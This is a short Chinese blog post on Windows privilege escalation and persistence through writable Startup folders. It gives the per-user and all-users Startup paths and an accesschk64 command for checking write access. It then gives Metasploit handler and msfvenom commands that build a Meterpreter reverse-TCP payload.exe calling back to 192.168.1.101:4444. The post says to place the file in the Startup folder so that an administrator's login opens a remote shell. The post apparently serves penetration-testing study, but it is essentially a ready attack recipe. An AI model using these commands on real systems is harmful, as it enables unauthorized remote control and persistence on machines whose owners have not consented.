可修改的开机自启文件夹 发表于 2020-02-24 | 分类于 windows | 阅读数 次 自启文件夹 单用户的自启文件夹 1C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 所有用户的自启文件夹 1C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup 查看权限 123C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" --- 生成攻击载荷 1234msfconsole handler -H 192.168.1.101 -P 4444 -p windows/x64/meterpreter/reverse_tcp msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o payload.exe 将payload.exe放在startup文件夹下,当管理员登陆,即可获得shell。